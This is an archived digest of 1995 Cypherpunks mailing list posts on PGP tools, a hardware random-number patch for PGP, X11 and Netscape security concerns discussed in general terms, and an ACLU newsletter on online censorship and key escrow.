Subject: Re: New Windoze PGP Shell (freeware)  worth checking out
In-Reply-To: <m0t0R8m-000HMgC@powergrid.electriciti.com>
Message-ID: <winATT-2.7-karlsiil-1616>
MIME-Version: 1.0
Content-Type: text/plain


OK, I'll bite. Where do I get it? Where did you get your info? Do you have a 
copy?

					Karl A.Siil
					AT&T BCS
					Holmdel, NJ


------------- Begin Original Message -------------
Date: Wed Oct  4 03:26:58 -0700 1995
From: internet!powergrid.electriciti.com!adam (Adam Philipp)
Subject: New Windoze PGP Shell (freeware)  worth checking out
To: internet!toad.com!cypherpunks
Content-Type: Text
Content-Length: 1313

-----BEGIN PGP SIGNED MESSAGE-----

AEgis Research (who I know nothing about) has come out with a very pleasant
windows fron end for PGP. It is bone-head compliant, and even works well in
Win95. I'm only plugging because I was so impressed. Until Eudora has PGP
hooks, this is my shell of choice.

   Adam Philipp

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMHJgjm/ZTaRmpgTFAQGp+wf7BO36FpbAdLdDieORKldIe3MvPa8wUDpR
Rax38rxSP+aeR0toqtuldmWpfV5I+p40d+6pgWVfOKegS38Qt3k6rEt3r7C++Efi
PQZLOE3b4RHT5ZeS4klEZtwu1A8nTWMVZFkwcxTb6s+C3KYv9JxdXFHnrOPlnkcL
5AJhUDvznMnA1WhKmknNjXhGJH9FKtvNuTO/k1fmD6YwclqAbKBiuGwQduWqZfwI
0zGZlpSfbuZ6sCsbHFnw1wJIOONyAEr1dB5qhyV3rX00hm6KfSNsuGqwvlDhaOM9
lODlFwBVt+PJIRHVocCcCdp7/5ffE/hTIXoRNYYF0kcZTotJP05SXg==
=fvcQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 4 Oct 95 11:05:49 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <44td0c$3um@tera.mcom.com>
Message-ID: <199510041800.LAA07074@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> How do I decide what is too long?  For example, when tracking down buffer
> overflow problems for the security patch, we found an undocumented
> static buffer limit of 64 bytes for the hostname passed to gethostbyname()
> on IRIX.  Before we stumbled across this problem, we had a discussion
> about what length we should truncate host names to.  People thought
> that 128 characters was a reasonable limit, but it turned out that it
> was too long.


	Isn't there a resolver #define or something in limits.h called
MAXHOSTNAMELEN ? Something like that? (Perhaps not, but that's what I
recall..)

> latent bugs.  We are also beefing up our QA to try to find more
> of these types of bugs.
> 
	great!


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael J Gebis <gebis@ecn.purdue.edu>
Date: Wed, 4 Oct 95 09:11:38 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape hole without .Xauthority (fwd)
Message-ID: <199510041611.LAA20818@purcell.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


Robert Owen Thomas wrote:
> more and more, networks are becoming flooded with X traffic.  although X
> has always been known to be a potential security hole, i think X-attacks
> are going to increase dramatically in the coming months.
> 
> i commonly hear of sights with Xauthority enabled, only to have the user
> community type "xhost +" at the prompt.  bad karma.  the days of pumping
> rude & crass noises to someone else's workstation will soon graduate to
> more nefarious and insidious attacks.
> 
> is anyone looking into a means of securing X (above and beyond the current
> weak solutions)?
 
I have not used it for this purpose, but ssh claims to do "Secure X11
sessions."  

Actually, I'm interested in what the cypherpunks think of ssh in
general; I'm not able to do a strong analysis of the code myself.  If
it does everything it claims to do, it's a very powerful tool;
however, I don't know of any in-depth studies of ssh security.

-- 
Mike Gebis  gebis@ecn.purdue.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Oct 95 08:17:16 PDT
To: cypherpunks@toad.com
Subject: FIZ_zle
Message-ID: <199510041517.LAA15917@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-4-95. W$Japer:


   "MasterCard, Backed by IBM and Others, Enters Fight for
   Internet-Payment Rules."

      MasterCard said it entered into a collaborative effort
      with IBM, Netscape, CyberCash and GTE to release a draft
      of technical requirements for any software companies and
      financial institutions that want to develop programs for
      electronic commerce.


   "Lockheed Plans Satellite System For $4 Billion."

      Lockheed Martin proposed to build a $4 billion satellite
      system for two-way global computer networking,
      videoconferencing and other on-demand services in a
      challenge to plans by the Hughes unit of GM and the
      separate Teledesic venture. Lockheed disclosed that it
      has filed for FCC authority to place nine large
      satellites in high-altitude orbits by about the year
      2000 to form a new system called Astrolink for
      high-data-rate transmissions.


   "Morgan Stanley Puts $200 Million In Telecom Venture."

      In an effort to ride the global telecommunications boom,
      Morgan Stanley Capital Partners is investing $200
      million in Sita Group in a move to allow the world-wide
      airline cooperative to create a for-profit
      telecommunications unit.


   Trinity:  FIZ_zle  (11 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Oct 95 08:18:44 PDT
To: cypherpunks@toad.com
Subject: PIZ_zaz
Message-ID: <199510041518.LAA16077@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-4-95. NYPaper:


   "AT&T Puts New Emphasis On Satellites. 12-Spacecraft
   Network Proposed to Regulators."

      The AT&T Corporation, in an early sign of how it plans
      to pursue its Internet and global communications
      strategy after the company's planned divestiture, has
      quietly filed a Federal application to build and launch
      a multibillion-dollar global satellite network. The
      system would let computer users bypass local telephone
      networks and connect directly to the Internet via
      satellite dish antennas slightly larger than two feet in
      diameter.


   "Satellite Services Hear the Naysayers."

      The concept has great promise: a string of satellites
      offering global wireless telephone service, where the
      caller is never out of range. Making the concept
      reality, however, is proving stubbornly difficult. The
      four major services in the nascent global wireless
      business are on the defensive for the first time in
      their brief history. A pair of troubled debt offerings
      have raised questions about the viability of so-called
      global personal communications.


   "A New Computer Dazzles a Jaded Industry Crowd."

      The BeBox is incompatible with everything now on the
      market. But the sheer dazzle of the new personal
      computer by Jean-Louis Gassee, the former engineering
      head of Apple Computer Inc., drew a standing ovation
      from a normally skeptical crowd of 500 of some of the
      most discerning executives in technology.


   Trio:  PIZ_zaz  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 4 Oct 95 11:23:15 PDT
To: cypherpunks@toad.com
Subject: Random number generators
Message-ID: <199510041822.LAA22783@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.uni-karlsruhe.de/~RNG/
>    Random number generators
> 
> --------------------------------------------------------------------
> Diese Seite gibt es noch nicht in Deutsch.
> --------------------------------------------------------------------
> 
> Classification of random numbers
> 
> Random numbers for use in computer programs can be classified into 3
> different categories:
> 
>    * Truely random numbers:
>      Truely random numbers obviosly cannot be produced by computer
>      programs, they must be supplied by an external source like
>      radioactive decay. Such sequences are available (e.g. on
>      magnetic tape), but clumsy to use and often not sufficient in
>      terms of speed and number.
>    * Pseudorandom numbers:
>      A sequence of numbers is generated by an algorithm in a way
>      that the resulting numbers look statistically independent and
>      uniformly distributed. This is the prevailing method used in
>      random number generators.
>    * Quasirandom numbers:
>      These are generated by algorithms tuned to optimize the
>      sequences uniform distribution, which can improve the accuracy
>      of Monte-Carlo integration. These numbers are not independent
>      and thus cannot be used generally.
> 
> Other than uniform distributions can be generated by suitable
> transformations of the basic uniformly distributed sequence.
> Numerical libraries often offer a rich set of distributions.
> 
> Desirable properties of (pseudo) random numbers
> 
> A good random number generator (RNG) should have the following
> properties:
> 
>    * Good statistical properties:
>      There are theoretical and empirical tests to judge a RNGs
>      quality. Every generator should always be tested with one's
>      actual application: the standard tests can only disqualify a
>      RNG and may not check for the properties the application
>      requires.
>    * Long period:
>      RNG algorithms are iteration formulae. The state is often
>      stored in a single integer, in this case there cannot be more
>      states than representable integers (recall 2^30 \approx 10^9).
>    * Reproducibility:
>      All generators can initialize the sequence by a starting seed.
>      Storing and reloading a generator's internal state is also
>      useful.
>    * Portability:
>      This concerns both programming language (e.g. Fortran 90 or
>      ANSI C) as well as machine-dependent (e.g. floating point
>      representation) aspects. The ideal RNG produces (bit-)
>      identical results in every environment.
>    * Efficient implementation:
>      This may be irrelevant for "general purpose" generators. But
>      time-critical applications may require inline coding and/or the
>      generation of whole vectors of random numbers at once. Vector
>      and parallel computers need special RNG methods.
> 
> Which of these aspects is most important depends on the actual
> application, of course.
> 
> Miscellaneous RNG material
> 
> What follows is a collection of material on pseudorandom number
> generators. I hope to improve this soon...
> 
>    * The RNG Chapter of Designing and Building Parallel Programs by
>      Ian Foster
>    * The pLab pages at Salzburg University
>    * The RNG Document of ORNL's Computational Science Education
>      Project
>    * My publications on RNGs are available online, also some slides
>    * My BiBTeX-bibliographies of articles and books on random number
>      generation
>    * The RAND/VP package contains a RNG tuned for our vector
>      computer SNI S600/20
>    * The NAG and IMSL Fortran libraries contain random number
>      generators for various distributions
>    * Popular public-domain sources include the StatLib and NetLib
>      libraries
>    * My publications on RNGs and the RANEXP library are available by
>      anonymous ftp also.
>      URL: ftp://ftp.rz.uni-karlsruhe.de/pub/misc/random/
>    * A good source of RNG codes and articles is the journal Computer
>      Physics Communications, ISSN 0010-4655, published by
>      North-Holland.
> 
> --------------------------------------------------------------------
> Michael Hennecke / 21.07.1995







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Wed, 4 Oct 95 08:36:16 PDT
To: cypherpunks@toad.com
Subject: Re: New Windoze PGP Shell (freeware) worth checking out
Message-ID: <Pine.BSD/.3.91.951004112707.9222A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



The program can be found at http://iquest.com/~aegisrc/utils.shtml


      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mg5n+alias!rngaugp@andrew.cmu.edu
Date: Wed, 4 Oct 95 12:06:51 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510041902.MAA00279@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There is now support for using a hardware random number generator
with the most recent versions of PGP.

Versions pgp 2.62 unofficial international versions,
	 pgp 2.62 international version
and	 pgp 2.62 (from mit)
are supported. The files for this modification of pgp
are at the export controled ftp site in the directory:

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_????????/pgp/rng

the files are:	
		rg262mit.zip	
		rg262i.zip	(Can be used in Canada)
		rg262ui.zip	(Can be used in Canada)

Sources for the modifications are included. Executables are
included for OS/2 and MSDOS.

In the above ????????? varies because of the export control
scheme. To get the files if you are in the U.S. and Canada
first get the file ftp://ftp.csn.net/mpj/README.MPJ and
follow the instructions.

Many thanks to mpj@netcom.com for providing storage at the
export controled ftp site.

Here is the README file that comes with the modifications.
- ----------------------------------------

	       Hardware Random Number Support for PGP.
			       Version

Ever get tired of typing in keyboard timing strokes while generating a
PGP key? Ever want to use PGP unattended, but be foiled because there is
no one there to type the keyboard timing strokes?

Ever wonder if PGP's method of generating random number might have some
subtle flaw which would expose it to cryptanalysis?


This is a modified version of PGP which allows it to be used with a
hardware random number generator. Two kinds of RNG are supported: 
First, any RNG with a IO driver that makes the RNG look like a file that
can be opened (fopen) such that each byte read is a random byte. Second,
a bus RNG under the x86 architecture such that random bytes my be
obtained with a simple "IN" instruction. The CALNET/NEWBRIDGE RNG is an
example of this kind of RNG. A crude sanity check is done to check that
the bytes appear to be random.

To use the hardware random number generator feature of this software,
you must define _ONE_ of the new configuration file parameters RNGDRIVER
or RNGPORT in config.txt or from the command line.  If you have a RNG of
the first type, define RNGDRIVER to be the complete path to the RNG
driver. If you have a RNG of the second type, define RNGPORT to be the
port number from which to get random numbers. You can use hexadecimal
i.e. 0x300.

Examples:

RNGDRIVER=/dev/random

or

RNGPORT=0x300


If neither of these are defined the modified PGP will get its RANDOM
numbers in exactly the same way that regular PGP does, through keyboard
timing. If one of these parameters is set correctly, the modified PGP
will get its random numbers from the RNG and you will never be asked to
type keyboard timing stokes.



I have compiled a version of PGP that supports a hardware RNG for MSDOS
and OS/2. I have included the source files for each file that has been
modified. To compile get the original source files, put in the modified
files and compile as usual. 

The new source files and this software are covered by the same license
as the original, LICENCE.

There are similar available modifications for the other two major
versions  of PGP, OTHERS.

If someone out there has an PSI-LINE random number generator that
attaches to a RS-232 port as if it were a modem,  please test it with
this software. If the software line characteristics (baud rate, flow
control, stopbits, ect) are set correctly (You will have to do this
yourself, as this modified PGP does not do this) then all you should
have to do is set RNGDRIVER to the RS232 device name. I have not tested
this because I do not have this kind of RNG.

Someone may wish to add code to set the software line characteristics,
but this may be difficult, as the code would vary by operating system
and even among the various flavors of UNIX.

If you do such a test please report the results to alt.security.pgp and
cypherpunks.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHK/Sc29s2mG+tTVAQE0hwQAoDsgqF6AoIGCNOSOdWZemrGRl4/MVvjR
xiwhgROtjFM1FEL4Ak/j8YlR/LSCbOdeF3hZzesaZq8xC25qwlXFEtDX8kqim3zh
bOglEMW/x3M9uBQLm0Nyc8FTickaAD3L1Gsa/YMY2slmN3PrZiY0/KSVpPXEMHjK
GjeM2U7XJSk=
=E5gC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 4 Oct 95 04:06:47 PDT
To: Jamie Zawinski <jwz@netscape.com>
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <306C804A.3CE1CFB@netscape.com>
Message-ID: <199510041102.MAA17689@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| Jyri Kaljundi wrote:
| > 
| > There's a huge hole in the Netscape remote control mechanism for the
| > X-Windows based clients.
| > Potential impact : anybody can become any user that uses Netscape on any
| > system without sufficient X security.
| 
| Did you bother to read the spec?  This doesn't matter; if I can
| connect to your X server at all, you have already lost.  The spec
| (at http://home.netscape.com/newsref/std/x-remote.html) contains:

[snip]

This is all true, in a way.

But there is a growing number of applications that contains this kind
of remote execution capabilities, and whose security is dependant on
Xauth. I believe that X is soon becoming the weakest link in the
security chain.

I guess we don't have to discuss the quality of the 'magic cookie'
RNG's, do we? Not to mention the fact that the cookie is in effect
a password that is perfectly snoopable.

How common is DES-based Xauth-schemes? They are not used very
much, as far as I know. And if theyare, as in XDM, then again, what
about the RNG?

I guess this is just the distinction of breaking the glass window
in the back of the house, or to pick up the front door key from 
beneath the "Welcome" door mat, but anyway.

-Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ann Beeson <beeson@aclu.org>
Date: Wed, 4 Oct 95 09:10:25 PDT
To: infoaclu@aclu.org
Subject: ACLU Cyber-Liberties Update 10/4
Message-ID: <199510041605.MAA08420@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


October 4, 1995 
ACLU CYBER-LIBERTIES UPDATE                        **Premiere Issue** 
A bi-weekly online 'zine on cyber-liberties cases and controversies at the
state and federal level. 
---------------------------------------------------------------------------------------------------------------------- 
FEDERAL PAGE (Congress/Agency/Court Cases) 
---------------------------------------------------------------------------------------------------------------------- 
*	"Virtual" Child Pornography Bill is Overbroad and Fails to Protect Real
Children 
 
Despite the FBI's apparent success in raiding alleged child pornographers
on America Online, Senator Orrin Hatch decided we needed a new child
pornography law.  Hatch's bill would expand the existing child porn law to
include materials that are: 
	-visual depictions of what "appears to be . . . a minor engaging in
sexually explicit conduct;" and 
	-visual depictions "advertised, promoted, presented, described, or
distributed in such a manner that conveys the impression that the material
is or contains a visual depiction of a minor engaging in sexually explicit
conduct." 
In its effort to outlaw "virtual" child pornography, the bill would
criminalize a wide range of constitutionally protected expression. 
 
Hatch attempts to justify the new bill by reference to a widely-publicized
Canadian case in which a pornographer copied pictures of clothed children
from catalogs and morphed them into child pornography.  Senator Hatch
claims that the case would not be covered under the existing federal child
porn statute, but that issue has never been decided by a United States
court.  While the application of the existing statute to these facts is far
from clear, the Hatch bill covers *much more* than just this case scenario.
 The statute would cover *any* image of a child engaged in sexual behavior,
including non-computer-generated drawings, cartoons, and visual images
created without the use of photos of real children or even real adults. 
 
In upholding child pornography laws, the Supreme Court has stated that "the
nature of the harm to be combated requires that the state offense be
limited to works that visually depict sexual conduct by children below a
specified age. . . .  [T]he distribution of descriptions or depictions of
sexual conduct, not otherwise obscene, which do not involve live
performance or photographic or other visual reproduction of live
performances, retains First Amendment protection." _New York v. Ferber_,
458 U.S. 747, 764-65 (1982). 
 
Hatch's "virtual child porn" law is clearly unconstitutional because it
would outlaw images produced without any involvement by an actual child. 
 
Bruce Taylor of the National Law Center for Families and Children argued at
a recent conference at Brooklyn Law School that a "virtual child porn" law
was needed because pedophiles use virtual porn to lure children.  Under
that rationale, if a pedophile used a piece of candy to lure a child into
sex we would have to outlaw candy.  In a free society, we cannot use
censorship laws to try to control "bad thoughts."  Outlawing all images
that might be stimulating to pedophiles would require a massive amount of
censorship and would *not* cure pedophilia. 
 
The ACLU reiterates its position on child pornography laws: 
 
"The ACLU believes that the First Amendment protects the dissemination of
all forms of communication.  The ACLU opposes on First Amendment grounds
laws that restrict the production and distribution of any printed and
visual materials even when some of the producers of those materials are
punishable under criminal law." 
 
"The ACLU views the use of children in the production of visual depictions
of sexually explicit conduct as a violation of childrens' rights when such
use is highly likely to cause:  a) substantial physical harm or, b)
substantial and continuing emotional or psychological harm.  Government
quite properly has the means to protect the interest of children in these
situations by the use of criminal prosecution of those persons who are
likely to cause such harm to children." 
 
The Hatch proposal only demonstrates the dangers of trying to protect
children indirectly through censorship laws. 
---------------------------------------------------------------------------------------------------------------------- 
*	Clipper II?  Your electronic privacy rights are at stake . . . again. 
 
In 1993, the ACLU and an overwhelming majority of industry condemned the
Clipper Chip -- the Administration's key escrow encryption scheme to equip
every telecommunications device with a "chip" that would allow anyone to
secure his private communications as long as the U.S. government held the
descrambling key.  The government insisted that Clipper would be merely a
voluntary standard, but government documents requested under the Freedom of
Information Act now confirm the suspicions of civil liberties advocates
that the government really believes key escrowed encryption will only meet
law enforcement standards if it is mandatory.  (See
URL:http://www.epic.org/crypto/) 
 
Now the Administration has returned with another scheme -- commercial key
escrow ("Clipper II").  At close range, Clipper II is a lot like Clipper I:

	*	Although supposedly "independent" of the government, key escrow agents
will have to meet standards set by the U.S. government, and will have to
reside in the U.S. or in a country with which the U.S. has entered a
bilateral agreement. 
	*	The proposal provides no privacy safeguards to prevent the compromise of
the key escrow agent or the key. 
	*	Offered as a "voluntary" standard, the proposal nevertheless forbids
interoperability with non-escrowed encryption in exported products. 
	*	While the government says it recognizes industry's need for strong
encryption, the proposal limits exportable encryption to 64 bits -- a
length widely recognized to provide inadequate security. 
 
On September 6, 7, and 15, 1995, the ACLU attended meetings held by the
National Institute for Standards and Technology (NIST) in Gaithersberg,
Maryland.  The meetings were called to solicit input from industry on the
Clipper II proposal.  Draft export criteria were considered on September
6-7, and the general industry response was very lukewarm -- except for a
few industries that have been meeting with the Administration and are
preparing to announce products that would fit the suggested criteria.  The
ACLU led one working group to vote 7-7 in favor of condemning the entire
proposal. 
 
On September 15th, NIST discussed the implementation of a federal key
escrow encryption standard.  By requiring federal agencies to use
commercial key escrow as a FIPS (Federal Information Processing Standard),
the Administration clearly hopes to drive industry to accept commercial key
escrow as the export standard as well. 
 
The ACLU issued the following statement on the current key escrow proposal:

 
The American Civil Liberties Union's Position 
on the Administration's Current Key Escrow Proposal: 
 
	*	Encryption is speech protected by the First Amendment.  The
Administration's current key escrow proposal, like the Clipper proposal,
continues to tread on the First Amendment rights of American individuals
and businesses to use encryption technologies to secure their private
communications.  The current proposal, like Clipper, should be rejected on
First Amendment grounds alone. 
	*	The current proposal will not accomplish its stated objectives because a
wide array of encryption is available around the globe and will continue to
be employed in place of American government-approved key escrow software. 
	*	The only key escrow proposal that could begin to satisfy the
government's objectives would be an outright ban on the sale of encryption
technologies other than those approved by the government and key escrowed. 
The ACLU fears that the current proposal, and similar proposals, are merely
the first step towards mandatory key escrow of encryption.  Mandatory key
escrow is completely unacceptable to both industry and privacy advocates. 
	*	The Administration should abandon its fruitless and unconstitutional
efforts to control the export of encryption technology.  No legislation is
needed -- the Administration has the power to lift the regulatory
restrictions that it created. 
---------------------------------------------------------------------------------------------------------------------- 
*	Call for Plaintiffs in Suit to Challenge Online Indecency Legislation 
	 
Most of you know that the House and Senate have now passed two different
versions of the telecommunications bill that would outlaw "indecent" speech
over the Internet and other online services.  This fall, a conference
committee of House and Senate members will work out the differences between
the two telco bills and will probably approve some form of online
censorship legislation. [For a copy of the legislation, send a message to
infoaclu@aclu.org, with "Online Indecency Amendments" in the subject line.]

 
While the ACLU and other advocacy groups continue to lobby Congress to
remove the censorship provisions from the telco bill, it is highly likely
that some restriction on online indecency will appear in the final bill
that emerges from the conference committee.  A coalition of civil liberties
organizations are preparing a constitutional challenge to this legislation
now.  The coalition includes the ACLU, Electronic Frontier Foundation,
Electronic Privacy Information Center, Media Access Project, and People for
the American Way.  We plan to be ready to file a lawsuit as soon as the
statute is signed into law -- which could be as early as October. 
 
An  important first step in planning the lawsuit is the selection of 
plaintiffs.  We need to put together a set of plaintiffs that disprove the
stereotype created by proponents of the legislation that people opposed to
the bill are "pedophiles and pornographers."   We believe that the best
plaintiffs for this challenge will be persons or entities that provide
material that some may deem  "indecent" but that has serious artistic,
literary, and educational value to our society.  We need plaintiffs who use
online networks to discuss or distribute works or art, literary classics,
sex education, gay and lesbian literature, human rights  reporting,
abortion information, rape counseling, and controversial political speech. 
 
Please contact Ann Beeson at the ACLU if your organization is interested in
being a plaintiff in this ground-breaking litigation that will define First
Amendment rights in cyberspace.  212-944-9800 x788, beeson@aclu.org. 
---------------------------------------------------------------------------------------------------------------------- 
STATE PAGE (Legislation/Agency/Court Cases) 
---------------------------------------------------------------------------------------------------------------------- 
*	Overbroad Searches and Seizures Threaten Electronic Privacy 
 
The latest threat to your civil liberties results from law enforcement's
overzealous attempts to find evidence of crime or wrongdoing in cyberspace.
 As we move into the information age, traditional search and seizure rules
will need to be refined to ensure fairness and respect for electronic
privacy rights.  Several recent cases illustrate how privacy rights can be
violated when law enforcement conducts investigations in cyberspace. 
	*	The ACLU recently wrote to America Online to inquire about their
cooperation in the FBI's recent raid of alleged child pornographers who
used the online service.  The ACLU asked, among other things, whether AOL
revealed any information about individual users that was not sought by
subpoena or court order; whether AOL turned over all private e-mail
messages of suspects or whether they turned over only messages related to
the alleged crime; whether AOL also turned over the names, addresses, and
e-mail messages of persons who had communicated with the suspects; whether
AOL set up accounts for the purpose of allowing government investigators to
have access to public chat rooms; and what information AOL regularly keeps
about its users' online activity and how long the information is kept. 
	*	In Cincinnati, Ohio, a computer bulletin board operator filed a civil
rights suit  against the Hamilton County Sheriff's Department after the
department raided the BBS and seized computer equipment, files, and
personal communications.  The case argues that the indiscriminate search
and seizures violated the BBS operator's free speech and privacy rights. 
See _Emerson v. Leis_, S.D. Ohio, No. C-1-95-608.  The subscribers to the
BBS have filed a separate class action suit against the sheriff's
department.  See _Guest v. Leis_, S.D. Ohio.  Law enforcement seized the
entire BBS -- all the hardware, software, files, and private communications
-- in an effort to obtain 45 files on the BBS that were allegedly obscene. 
The case asserts that the 45 files represented only 3% of the total
resources on the board. 
	*	In California, Colorado, and Virginia, the Church of Scientology has
brought three copyright infringement actions against anti-scientologists
who use online communications to criticize the church.  The cases raise
important questions about the breadth of computer communications seizures
in civil cases.  The ACLU of Southern California and the ACLU of Colorado
continue to monitor the cases in their states. 
---------------------------------------------------------------------------------------------------------------------- 
*	Nine States This Year Passed Online Censorship Legislation 
 
While online activists have been busy fighting the pending federal attempts
to censor online communications, state legislatures have been carelessly
crafting online censorship bills at home.  And if you think Congress is
full of Luddites, just wait until to hear what your state legislators have
come up with. 
 
At least nine states (CT, GA, IL, KS, MD, MT, NJ, OK, VA) have passed
legislation this year to regulate online content, and several others
considered such bills, with some still pending.  These bills seek to
criminalize a wide range of online speech and content, including: 
 
	*	speech that "harasses, annoys, or alarms" 
	*	materials deemed "indecent," "obscene" or "harmful to minors" 
	*	information related to "terrorist acts" or "explosive materials" 
 
The state bills, like the federal bills, raise serious free speech and
privacy concerns.  None of the bills indicates an understanding of the
unique nature of the online medium.  Some bills purposefully, and other
bills inadvertently, fail to clarify that only the initiators of the
illegal images may be held liable -- so service providers can be held
liable for the pedophiles and pornographers that use their networks. 
 
The laws would, at best, require service providers to snoop in private
e-mail in order to avoid criminal liability.  At worst, these laws would
force providers to shut down their networks altogether. 
 
The draconian effect of these state bills doesn't stop at state borders.  A
message you post to the Internet today in New York City could travel the
fifty states and the globe by tomorrow.  You'd better be careful that the
message isn't "obscene" according to an Oklahoman, "annoying" to a
Connecticutter, "solicitous" of a minor in Illinois, or related to
"terrorism" as defined by a Georgian. 
 
The wave of online censorship at the state level is far from over.  The
ACLU is considering constitutional challenges to the online censorship laws
that passed this year.  But given the continuing media hype over
"cyber-porn," we are certain to see more censorship bills from the states
next year. 
 
With the help of affiliate offices in fifty states, the ACLU continues to
monitor these state attempts to infringe on your online free speech rights.
 [For a synopsis of all the online censorship bills passed or considered by
the states this year, send a message to infoaclu@aclu.org with "Update of
State Bills" in the subject line of the message.] 
 
---------------------------------------------------------------------------------------------------------------------- 
*	Saving the Best for Last:  Good News on Cyber-Liberties 
 
ARIZONA:  Another troubling application of existing obscenity laws to
cyberspace was averted when charges were dropped against Arizona Department
of Public Safety Officer Lorne Shantz.  Shantz, who ran a community
bulletin board, lost his job and endured several months of hassle and
humiliation when he was arrested for allegedly "obscene" files on the
board.  Shantz maintains that he was unaware of the existence of the files,
which represented only a minuscule fraction of all the information on the
board. 
COLORADO:  Federal Judge John Kane ordered the Church of Scientology to
return computers and hundreds of files seized by Federal marshals and
Scientology officials in a copyright infringement action.  The judge ruled
that the seizures were overbroad, and said that "The public interest is
best served by the free exchange of ideas." 
---------------------------------------------------------------------------------------------------------------------- 
ONLINE RESOURCES FROM THE ACLU 
---------------------------------------------------------------------------------------------------------------------- 
Stay tuned for news on the ACLU's world wide web site, under construction
at http://www.aclu.org.  In the meantime, you can retrieve ACLU documents
via gopher at gopher://aclu.org:6601 (forgive the less-than-updated state
of our gopher -- we've devoted all our resources to WWW construction!).  If
you're on America Online, check out the live chats, auditorium events,
*very* active message boards, and complete news on civil liberties, at
keyword ACLU. 
---------------------------------------------------------------------------------------------------------------------- 
ACLU Cyber-Liberties Update 
Editor: Ann Beeson (beeson@aclu.org) 
American Civil Liberties Union National Office 
132 West 43rd Street 
New York, New York 10036 
 
To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu@aclu.org with "subscribe ACLU" in the subject line of your
message.  To terminate your subscription, send a message to
infoaclu@aclu.org with "unsubscribe ACLU" in the subject line. 
 
For general information about the ACLU, write to infoaclu@aclu.org. 
----------------------------------------------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Wed, 4 Oct 95 04:19:00 PDT
To: cypherpunks@toad.com
Subject: Re: More forged cancels
Message-ID: <6495.199510041118@olib>
MIME-Version: 1.0
Content-Type: text/plain



[someone crossposting to a ton of alt groups about spam, the headers:

Newsgroups: news.admin.net-abuse.misc,
soc.culture.german,
soc.culture.jewish,
rec.radio.shortwave,
alt.2600,
mail.cypherpunks,
^^^^^^^^^^^^^^^^^
alt.privacy.anon-server,
alt.stop.spamming,
alt.stop-spamming]


It's started already.  This is because of "mail.cypherpunks" in the
huge newsgroup line?  A news to mail gateway pointing at
cypherpunks@toad.com?

Any chances of disabling this before it gets out of hand?

Who runs the gateway(s)?  Make it read only please!  Or change the
gateway so it doesn't forward if there are other groups on the
newsgroup line or something.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 3 Oct 95 19:20:58 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510031403.ZM151@tofuhut>
Message-ID: <199510040218.MAA04820@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello "Jeff Weinstein" <jsw@netscape.com>
  and Laurent Demailly <dl@hplyot.obspm.fr>,
  and jsw@neon.netscape.com (Jeff Weinstein)
  and cypherpunks@toad.com

"Jeff Weinstein" <jsw@netscape.com> writes:

> On Oct 3,  6:19pm, Laurent Demailly wrote:
> > Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was R
...
> 
>   Yes, I get the idea about spewing the signed hashes everywhere.  The
> problem I have is with the user of PGP.  That will help cypherpunks,
> but does absolutely nothing for most of our millions of users, who
> have no idea what PGP is.

Provided they know at least one person who does, they might well ask
that person to come and verify it for them.

Then again the tampered-with version might not mention PGP-signatures
at all (unless you use it widely in your publicity).

> Perhaps its enough to assume that if anyone
> is tampering with the distribution, some cypherpunk will stumble across
> it...

You wouldn't want that to be your only argument, but it helps...

If you mention all over the place that the program is PGP-signed
